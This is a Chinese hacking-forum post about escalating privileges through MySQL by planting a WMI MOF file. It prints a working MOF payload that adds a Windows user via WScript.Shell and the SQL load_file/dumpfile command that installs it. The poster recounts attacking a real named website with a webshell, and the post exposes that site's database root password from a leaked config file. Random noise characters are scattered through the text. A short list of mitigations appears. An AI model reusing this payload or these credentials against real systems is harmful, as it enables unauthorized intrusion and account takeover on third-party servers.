找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2342|回复: 0
打印 上一主题 下一主题

Mysql mof扩展漏洞实例与防范

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:49:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Mysql mof扩展漏洞防范方法
, k, o: q) J+ i2 {0 D
' M6 ?/ w/ Q4 |' N; X0 }网上公开的一些利用代码:; b0 B$ s3 J1 ?9 X: q
: _2 k1 B! X% Z  ~( {) M4 M( q
#pragma namespace(“\\\\.\\root\\subscription”)
) {' u4 i6 s# I: {2 J0 ~  p4 G: i  l! D6 e( V) j+ m" g" `# a
instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
( t( @) _) G! {8 H2 A9 |" q# ^4 E  Q) O
) n$ h% D6 Z& k$ u, Q; M; Q

# C. ]/ }% l* Q" ]9 a
3 W" G4 c* I& `) U/ H( J- k8 `: t/ W% ?5 b; B! u5 j1 K( ^
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;6 U, t6 s' q  t7 j! X4 N
从上面代码来看得出解决办法:( P6 J3 V) H1 W& Y3 w! ?

% `1 H3 R$ X  s9 @5 O5 o1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数6 ~9 ?( a4 v7 W

( G+ ?7 k' q& x2、禁止使用”WScript.Shel”组件, d' c+ W8 u6 h) m+ P
) o, Q  o1 n! X! ^- |% f! L& L2 {
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
+ R6 r1 V' o6 C8 \0 H
/ l6 M' q5 J$ [: f当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下* _0 C$ ^- g! c" Z8 a6 Q

' F% [  O& @6 |/ J; S/ N事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
- n4 }) }$ q, g8 N4 k2 h4 e# ]$ t3 |9 P
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容0 F  Z( n9 `! R8 x' D1 a" d

; }/ B- \  t) s/ U3 U看懂了后就开始练手吧
1 ^; z( |1 }; |$ a" x
9 y" @# U/ a, I9 ?" [( p2 fhttp://www.webbmw.com/config/config_ucenter.php 一句话 a  K% O3 m/ \2 k' \. ]
7 _  _) C- }3 K5 G
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
- |9 S! B3 `5 d( ~7 }2 U  L) F2 q* _& ]+ e* S$ r9 g
于是直接用菜刀开搞; c1 I6 C8 N) N# f$ I: h" h) O
3 d0 L( S( l! V1 D5 J- E* a, O
上马先2 F# O0 \/ Q+ I; t( `
/ b% y% m, O# f
既然有了那些账号 之类的 于是我们就执行吧…….
3 h# G. [$ R+ r" K; h6 \% C' Q* g9 `
小小的说下+ W  X9 V& v$ z5 K1 B

- l$ C5 D. c" V: F8 L在这里第1次执行未成功        原因未知2 @" ?% a9 Z* d

1 Z+ \2 W6 ^6 }  v% K: H9 s* Q' S( N我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
( m9 G2 o( u2 @- r, D$ ~4 }' T; U& ?( z* `- Z( q
#pragma namespace(“\\\\.\\root\\subscription”)' }. i9 W% ~2 w. Z/ W/ C

5 _3 E0 F- Q3 ^( Oinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };2 L: Y# C- v1 [/ D6 T8 w2 ^& D# d

2 C+ e1 }1 L4 Y; W, a我是将文件放到C:\WINDOWS\temp\1.mof0 a3 z; `7 B5 T2 k" Q: X& {) a
( u" w3 u' k- N% @) m. q, j
所以我们就改下执行的代码
8 E( K% L( O8 j) m% v) b& N0 S) M7 T  d* V; ]
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
: }, `% X% y5 }* K) n6 i; t) k3 e$ R# }# v9 v  o" j

7 t9 j, D$ g1 W/ o9 B- R; X7 Y/ A( A& `* w
但是 你会发现账号还是没有躺在那里。。7 T6 E: I8 y& e6 q6 I! A' ?: y! W. m
+ l( \5 N% M  `+ u
于是我就感觉蛋疼
) \& ~' E  W; @" N/ ]
+ Y3 f+ I; Y% I3 D- q. e1 u  y, W就去一个一个去执行 但是执行到第2个 mysql时就成功了………
4 H  U, `. i0 F6 B7 h9 l0 I9 K5 n8 k6 M- c% `

4 \& h9 D) l% ]  H! I: ^% O; t
) c6 Z4 B2 ^1 k但是其他库均不成功…) A- o8 u! m% A: z* q! F* i

9 x4 }& V; X4 N& @; s. k/ B我就很费解呀 到底为什么不成功求大牛解答…
3 K' x3 G! {6 b1 a( Q( a; }1 j7 F7 H3 ?0 X7 f
: u, K! D3 o! s- k

- i' W  Z8 K* |4 a7 O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表